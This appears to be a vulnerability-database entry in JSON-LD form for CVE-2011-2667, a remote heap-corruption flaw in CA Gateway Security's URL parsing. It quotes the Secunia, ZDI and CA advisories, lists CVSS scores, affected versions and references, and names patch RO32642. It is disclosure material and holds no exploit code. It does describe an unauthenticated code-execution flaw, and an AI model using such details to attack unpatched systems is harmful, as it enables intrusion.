iQEVAwUBTicU8pI1FvIeMomJAQHDpQgAlZ5TqT9B+I4zd20wzh8GhajqGb8BIuxo sCToQG5jq+kUX1QMnL+MVv4A0nR2o2P8cgxEhNtpEOyHnTeKvBuT//ALBpQgjYQ3 lMY3tRNrqEo1BAD9x/GqVp/xIBiaqkL80bt0BXmvxxhKblSX30mUA8D+v8P+DPrO eR+VEB7feWQ9LaqjIeEa5t8P5/TxuA+XNv0EdWtU7OAFc/IzXiu91XF++I+UJs3V l9Kvdj7x7JXyqZXc3943eUR/zqbxXO2/h/67Gj+N5ub1S4TBkPuoUMcPQ3o3l2WZ 75HcRT6AIHZ6shTbD20TCl1LUs4uKmJYc41kfbCEX3BsU12WbbV+zw== =w+9B -----END PGP SIGNATURE-----
Full-Disclosure - We believe in it. ----------------------------------------------------------------------
The Secunia Vulnerability Intelligence Manager (VIM) enables you to handle vulnerability threats in a simple, cost effective way.
Read more and request a free trial: http://secunia.com/products/corporate/vim/
TITLE: CA Gateway Security URL Parsing Vulnerability
SECUNIA ADVISORY ID: SA45332
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/45332/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=45332
RELEASE DATE: 2011-07-22
DISCUSS ADVISORY: http://secunia.com/advisories/45332/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/45332/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=45332
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: A vulnerability has been reported in CA Gateway Security, which can be exploited by malicious people to compromise a vulnerable system. This can be exploited to corrupt heap memory via specially crafted HTTP requests sent to TCP 8080.
The vulnerability is reported in versions prior to 8.1.0.69.
SOLUTION: Apply patch RO32642.
Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY: Andrea Micalizzi aka rgod via ZDI.
ORIGINAL ADVISORY: CA: https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={5E404992-6B58-4C44-A29D-027D05B6285D}
ZDI: http://www.zerodayinitiative.com/advisories/ZDI-11-237/
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
.
-- Vendor Response: CA states: CA20110720-01: Security Notice for CA Gateway Security and Total Defense
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=%7b5E404992-6B58-4C44-A29D-027D05B6285D%7d
-- Disclosure Timeline: 2011-01-21 - Vulnerability reported to vendor 2011-07-20 - Coordinated public release of advisory
-- Credit: This vulnerability was discovered by: * Andrea Micalizzi aka rgod
-- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201107-0229",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "gateway security",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "8.1"
},
{
"model": "total defense",
"scope": "eq",
"trust": 1.4,
"vendor": "ca",
"version": "r12"
},
{
"model": "total defense",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "r12"
},
{
"model": "gateway security",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "8.1.0.69"
},
{
"model": "gateway security",
"scope": "lt",
"trust": 0.8,
"vendor": "ca",
"version": "8.1"
},
{
"model": "total defense suite",
"scope": null,
"trust": 0.7,
"vendor": "ca",
"version": null
},
{
"model": "associates gateway security",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates gateway security",
"scope": "ne",
"trust": 0.3,
"vendor": "computer",
"version": "9.0"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-11-237"
},
{
"db": "BID",
"id": "48813"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004769"
},
{
"db": "CNNVD",
"id": "CNNVD-201107-323"
},
{
"db": "NVD",
"id": "CVE-2011-2667"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:ca:gateway_security",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:total_defense",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2011-004769"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Andrea Micalizzi aka rgod",
"sources": [
{
"db": "ZDI",
"id": "ZDI-11-237"
},
{
"db": "BID",
"id": "48813"
},
{
"db": "CNNVD",
"id": "CNNVD-201107-323"
}
],
"trust": 1.6
},
"cve": "CVE-2011-2667",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2011-2667",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 2.5,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-50612",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2011-2667",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2011-2667",
"trust": 0.8,
"value": "High"
},
{
"author": "ZDI",
"id": "CVE-2011-2667",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201107-323",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-50612",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-11-237"
},
{
"db": "VULHUB",
"id": "VHN-50612"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004769"
},
{
"db": "CNNVD",
"id": "CNNVD-201107-323"
},
{
"db": "NVD",
"id": "CVE-2011-2667"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Icihttp.exe in CA Gateway Security for HTTP, as used in CA Gateway Security 8.1 before 8.1.0.69 and CA Total Defense r12, does not properly parse URLs, which allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption and daemon crash) via a malformed request. Authentication is not required to exploit this vulnerability. The specific flaw exists within the Icihttp.exe module (CA Gateway Security for HTTP), which responds to incoming HTTP requests on port 8080. Due to a flawed copy-loop algorithm in the URL parsing routine, it is possible for a remote unauthenticated user to cause an exploitable heap corruption condition. This could result in the execution of arbitrary code under the context of the Gateway Security service. Computer Associates Total Defense and Gateway Security are prone to a remote code-execution vulnerability. \nSuccessfully exploiting this issue will allow attackers to execute arbitrary code with elevated privileges, completely compromising affected computers. \nTotal Defense r12 and Gateway Security 8.1 are vulnerable; other versions may also be affected. CA has issued an update that\nresolves the vulnerability. \n\nThe vulnerability, CVE-2011-2667, occurs due to insufficient bounds\nchecking that can result in a memory overwrite on the heap. By\nsending a malformed request, an attacker can overwrite a sensitive\nportion of heap memory, which can potentially result in server\ncompromise. If the version displayed is less than 8.1.0.69,\nthe installation is vulnerable. \n\nSolution\n\nGateway Security r8.1:\nApply fix RO32642\n\nAlternatively, update to Gateway Security 9.0 available from the CA\nsupport site. \n(url line wraps)\nhttps://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=17\n7782\n\nRegards,\n\nKevin Kotas\nCA Product Vulnerability Response Team\n\n-----BEGIN PGP SIGNATURE-----\nVersion: PGP 8.1\n\niQEVAwUBTicU8pI1FvIeMomJAQHDpQgAlZ5TqT9B+I4zd20wzh8GhajqGb8BIuxo\nsCToQG5jq+kUX1QMnL+MVv4A0nR2o2P8cgxEhNtpEOyHnTeKvBuT//ALBpQgjYQ3\nlMY3tRNrqEo1BAD9x/GqVp/xIBiaqkL80bt0BXmvxxhKblSX30mUA8D+v8P+DPrO\neR+VEB7feWQ9LaqjIeEa5t8P5/TxuA+XNv0EdWtU7OAFc/IzXiu91XF++I+UJs3V\nl9Kvdj7x7JXyqZXc3943eUR/zqbxXO2/h/67Gj+N5ub1S4TBkPuoUMcPQ3o3l2WZ\n75HcRT6AIHZ6shTbD20TCl1LUs4uKmJYc41kfbCEX3BsU12WbbV+zw==\n=w+9B\n-----END PGP SIGNATURE-----\n\n_______________________________________________\nFull-Disclosure - We believe in it. ----------------------------------------------------------------------\n\nThe Secunia Vulnerability Intelligence Manager (VIM) enables you to handle vulnerability threats in a simple, cost effective way. \n\nRead more and request a free trial:\nhttp://secunia.com/products/corporate/vim/\n\n----------------------------------------------------------------------\n\nTITLE:\nCA Gateway Security URL Parsing Vulnerability\n\nSECUNIA ADVISORY ID:\nSA45332\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/45332/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=45332\n\nRELEASE DATE:\n2011-07-22\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/45332/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/45332/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=45332\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nA vulnerability has been reported in CA Gateway Security, which can\nbe exploited by malicious people to compromise a vulnerable system. This can be\nexploited to corrupt heap memory via specially crafted HTTP requests\nsent to TCP 8080. \n\nThe vulnerability is reported in versions prior to 8.1.0.69. \n\nSOLUTION:\nApply patch RO32642. \n\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nPROVIDED AND/OR DISCOVERED BY:\nAndrea Micalizzi aka rgod via ZDI. \n\nORIGINAL ADVISORY:\nCA:\nhttps://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={5E404992-6B58-4C44-A29D-027D05B6285D}\n\nZDI:\nhttp://www.zerodayinitiative.com/advisories/ZDI-11-237/\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. \n\n-- Vendor Response:\nCA states:\nCA20110720-01: Security Notice for CA Gateway Security and Total\nDefense\n\nhttps://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=%7b5E404992-6B58-4C44-A29D-027D05B6285D%7d\n\n-- Disclosure Timeline:\n2011-01-21 - Vulnerability reported to vendor\n2011-07-20 - Coordinated public release of advisory\n\n-- Credit:\nThis vulnerability was discovered by:\n * Andrea Micalizzi aka rgod\n\n-- About the Zero Day Initiative (ZDI):\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \na best-of-breed model for rewarding security researchers for responsibly\ndisclosing discovered vulnerabilities. \n\nResearchers interested in getting paid for their security research\nthrough the ZDI can find more information and sign-up at:\n\n http://www.zerodayinitiative.com\n\nThe ZDI is unique in how the acquired vulnerability information is\nused. Instead, upon notifying the affected product vendor,\nTippingPoint provides its customers with zero day protection through\nits intrusion prevention technology. Explicit details regarding the\nspecifics of the vulnerability are not exposed to any parties until\nan official vendor patch is publicly available. Furthermore, with the\naltruistic aim of helping to secure a broader user base, TippingPoint\nprovides this vulnerability information confidentially to security\nvendors (including competitors) who have a vulnerability protection or\nmitigation product. \n\nOur vulnerability disclosure policy is available online at:\n\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\n\nFollow the ZDI on Twitter:\n\n http://twitter.com/thezdi\n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2011-2667"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004769"
},
{
"db": "ZDI",
"id": "ZDI-11-237"
},
{
"db": "BID",
"id": "48813"
},
{
"db": "VULHUB",
"id": "VHN-50612"
},
{
"db": "PACKETSTORM",
"id": "103195"
},
{
"db": "PACKETSTORM",
"id": "103256"
},
{
"db": "PACKETSTORM",
"id": "103181"
}
],
"trust": 2.88
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-50612",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-50612"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2011-2667",
"trust": 3.7
},
{
"db": "ZDI",
"id": "ZDI-11-237",
"trust": 2.9
},
{
"db": "BID",
"id": "48813",
"trust": 2.0
},
{
"db": "SECUNIA",
"id": "45332",
"trust": 1.9
},
{
"db": "SECTRACK",
"id": "1025813",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1025812",
"trust": 1.7
},
{
"db": "SREASON",
"id": "8316",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004769",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-1017",
"trust": 0.7
},
{
"db": "CNNVD",
"id": "CNNVD-201107-323",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "103195",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "103181",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-50612",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "103256",
"trust": 0.1
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-11-237"
},
{
"db": "VULHUB",
"id": "VHN-50612"
},
{
"db": "BID",
"id": "48813"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004769"
},
{
"db": "PACKETSTORM",
"id": "103195"
},
{
"db": "PACKETSTORM",
"id": "103256"
},
{
"db": "PACKETSTORM",
"id": "103181"
},
{
"db": "CNNVD",
"id": "CNNVD-201107-323"
},
{
"db": "NVD",
"id": "CVE-2011-2667"
}
]
},
"id": "VAR-201107-0229",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-50612"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-11T22:54:00.917000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "CA20110720-01: Security Notice for CA Gateway Security and Total Defense",
"trust": 0.8,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=%7B5E404992-6B58-4C44-A29D-027D05B6285D%7D"
},
{
"title": "CA20110720-01: Security Notice for CA Gateway Security and Total Defense",
"trust": 0.7,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=%7b5E404992-6B58-4C44-A29D-027D05B6285D%7d"
},
{
"title": "CA Total Defense and Gateway Security Fixes for remote code execution vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=147280"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-11-237"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004769"
},
{
"db": "CNNVD",
"id": "CNNVD-201107-323"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-50612"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004769"
},
{
"db": "NVD",
"id": "CVE-2011-2667"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.1,
"url": "http://www.zerodayinitiative.com/advisories/zdi-11-237/"
},
{
"trust": 1.9,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=%7b5e404992-6b58-4c44-a29d-027d05b6285d%7d"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/48813"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/518935/100/0/threaded"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/518934/100/0/threaded"
},
{
"trust": 1.7,
"url": "http://securitytracker.com/id?1025812"
},
{
"trust": 1.7,
"url": "http://securitytracker.com/id?1025813"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/45332"
},
{
"trust": 1.7,
"url": "http://securityreason.com/securityalert/8316"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/68736"
},
{
"trust": 1.0,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid={5e404992-6b58-4c44-a29d-027d05b6285d}"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2667"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-2667"
},
{
"trust": 0.3,
"url": "http://www.ca.com"
},
{
"trust": 0.3,
"url": "https://support.ca.com/irj/portal/anonymous/solndtls?aparno=ro32642\u0026os=nt\u0026actionid=3"
},
{
"trust": 0.2,
"url": "http://secunia.com/"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-2667"
},
{
"trust": 0.2,
"url": "http://lists.grok.org.uk/full-disclosure-charter.html"
},
{
"trust": 0.1,
"url": "http://support.ca.com/"
},
{
"trust": 0.1,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=17"
},
{
"trust": 0.1,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid={5"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/45332/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=45332"
},
{
"trust": 0.1,
"url": "http://secunia.com/products/corporate/vim/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/45332/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com/advisories/disclosure_policy/"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com/advisories/zdi-11-237"
},
{
"trust": 0.1,
"url": "http://twitter.com/thezdi"
},
{
"trust": 0.1,
"url": "http://www.tippingpoint.com"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-11-237"
},
{
"db": "VULHUB",
"id": "VHN-50612"
},
{
"db": "BID",
"id": "48813"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004769"
},
{
"db": "PACKETSTORM",
"id": "103195"
},
{
"db": "PACKETSTORM",
"id": "103256"
},
{
"db": "PACKETSTORM",
"id": "103181"
},
{
"db": "CNNVD",
"id": "CNNVD-201107-323"
},
{
"db": "NVD",
"id": "CVE-2011-2667"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZDI",
"id": "ZDI-11-237"
},
{
"db": "VULHUB",
"id": "VHN-50612"
},
{
"db": "BID",
"id": "48813"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004769"
},
{
"db": "PACKETSTORM",
"id": "103195"
},
{
"db": "PACKETSTORM",
"id": "103256"
},
{
"db": "PACKETSTORM",
"id": "103181"
},
{
"db": "CNNVD",
"id": "CNNVD-201107-323"
},
{
"db": "NVD",
"id": "CVE-2011-2667"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-07-20T00:00:00",
"db": "ZDI",
"id": "ZDI-11-237"
},
{
"date": "2011-07-28T00:00:00",
"db": "VULHUB",
"id": "VHN-50612"
},
{
"date": "2011-07-20T00:00:00",
"db": "BID",
"id": "48813"
},
{
"date": "2012-03-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-004769"
},
{
"date": "2011-07-21T00:35:53",
"db": "PACKETSTORM",
"id": "103195"
},
{
"date": "2011-07-21T07:04:10",
"db": "PACKETSTORM",
"id": "103256"
},
{
"date": "2011-07-20T18:35:17",
"db": "PACKETSTORM",
"id": "103181"
},
{
"date": "1900-01-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201107-323"
},
{
"date": "2011-07-28T22:55:02.390000",
"db": "NVD",
"id": "CVE-2011-2667"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-07-20T00:00:00",
"db": "ZDI",
"id": "ZDI-11-237"
},
{
"date": "2018-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-50612"
},
{
"date": "2011-07-20T00:00:00",
"db": "BID",
"id": "48813"
},
{
"date": "2012-03-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-004769"
},
{
"date": "2021-04-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201107-323"
},
{
"date": "2025-04-11T00:51:21.963000",
"db": "NVD",
"id": "CVE-2011-2667"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "103195"
},
{
"db": "PACKETSTORM",
"id": "103181"
},
